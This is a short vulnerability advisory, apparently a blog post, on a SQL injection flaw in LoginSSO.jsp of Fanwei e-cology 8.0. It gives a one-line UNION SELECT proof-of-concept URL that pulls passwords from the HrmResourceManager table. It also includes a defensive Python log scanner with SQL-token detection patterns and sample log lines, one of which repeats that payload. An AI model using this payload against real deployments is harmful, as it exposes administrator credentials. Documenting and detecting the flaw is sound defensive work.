Fanwei OA E-Cology LoginSSO.jsp SQL injection vulnerability CNVD-2021-33202
Vulnerability Description
Fanwei e-cology is an OA (office automation) system built for large and medium-sized enterprises, with simultaneous support for PC, mobile and WeChat clients. Fanwei e-cology has a SQL injection vulnerability in LoginSSO.jsp.
Vulnerability Impact
Fanwei e-cology 8.0
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager
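To check whether a deployment has already received this request, the following added example (not part of the original post) scans web access logs for calls to LoginSSO.jsp whose id parameter carries SQL syntax. It assumes combined-format access logs and that legitimate id values are numeric; the log lines are constructed samples, and because the request above reaches LoginSSO.jsp through a /upgrade/detail.jsp path prefix, the check matches on the path suffix.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL tokens that should never appear in the id parameter.
SQL_TOKENS = re.compile(r"\b(union|select|from|waitfor|exec)\b|--|;|'", re.I)
TARGET = "/login/loginsso.jsp"

# Constructed sample log lines; the last one carries the request shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login/Login.jsp HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /login/LoginSSO.jsp?id=42 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:01:10 +0000] "GET /upgrade/detail.jsp/login/LoginSSO.jsp'
    '?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1" 200 64',
]

def inspect(line):
    """Return a reason string if the log line looks like an injection attempt, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower()
    if not path.endswith(TARGET):
        return None
    reasons = []
    if path != TARGET:
        reasons.append("path prefix before LoginSSO.jsp")
    # parse_qs URL-decodes the values, so %20 and + both become spaces.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if SQL_TOKENS.search(value):
            reasons.append("SQL keyword in id")
        elif not value.isdigit():  # assumption: legitimate ids are numeric
            reasons.append("non-numeric id")
    return "; ".join(reasons) or None

def scan(lines):
    """Return (line index, reason) for every suspicious entry."""
    hits = []
    for i, line in enumerate(lines):
        reason = inspect(line)
        if reason:
            hits.append((i, reason))
    return hits

if __name__ == "__main__":
    for i, reason in scan(SAMPLE_LOG):
        print(f"line {i}: {reason}")
```

A hit in historical logs means the HrmResourceManager credentials should be treated as exposed and rotated.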
This post is licensed under CC BY 4.0 by the author.